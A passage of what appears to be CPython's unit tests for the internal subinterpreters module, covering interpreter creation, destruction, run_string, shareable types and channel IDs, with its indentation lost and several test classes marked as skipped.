    # The reason is that the worker thread may not get scheduled to run the
    # subinterpreter before the main thread checks on it, so wait for it here.
if timeout is None:
timeout = support.SHORT_TIMEOUT
start_time = time.monotonic()
deadline = start_time + timeout
while not interpreters.is_running(interp):
if time.monotonic() > deadline:
raise RuntimeError('interp is not running')
time.sleep(0.010)
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
_wait_for_interp_to_run(interp)
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
@unittest.skip("sgross: skip subinterpreter tests")
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
@unittest.skip("sgross: skip subinterpreter tests")
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
@unittest.skip("sgross: skip subinterpreter tests")
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
@unittest.skip("sgross: skip subinterpreter tests")
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
@unittest.skip("sgross: skip subinterpreter tests")
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
@unittest.skip("sgross: skip subinterpreter tests")
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
@unittest.skip("sgross: skip subinterpreter tests")
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
@unittest.skip("sgross: skip subinterpreter tests")
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
subinterp = interpreters.create(isolated=False)
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(subinterp, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
def test_channel_list_interpreters_none(self):
"""Test listing interpreters for a channel with no associations."""
# Test for channel with no associated interpreters.
cid = interpreters.channel_create()
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_basic(self):
"""Test basic listing channel interpreters."""
interp0 = interpreters.get_main()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
# Test for a channel that has one end associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
interp1 = interpreters.create()
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Test for channel that has both ends associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_multiple(self):
"""Test listing interpreters for a channel with many associations."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
interp3 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, "send")
"""))
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
_run_output(interp3, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(set(send_interps), {interp0, interp1})
self.assertEqual(set(recv_interps), {interp2, interp3})
def test_channel_list_interpreters_destroyed(self):
"""Test listing channel interpreters with a destroyed interpreter."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Should be one interpreter associated with each end.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
interpreters.destroy(interp1)
# Destroyed interpreter should not be listed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_released(self):
"""Test listing channel interpreters with a released channel."""
# Set up one channel with main interpreter on the send end and two
# subinterpreters on the receive end.
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "data")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
interpreters.channel_send(cid, "data")
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Check the setup.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 2)
# Release the main interpreter from the send end.
interpreters.channel_release(cid, send=True)
# Send end should have no associated interpreters.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(len(recv_interps), 2)
# Release one of the subinterpreters from the receive end.
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
# Receive end should have the released interpreter removed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_closed(self):
"""Test listing channel interpreters with a closed channel."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Force close the channel.
interpreters.channel_close(cid, force=True)
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
def test_channel_list_interpreters_closed_send_end(self):
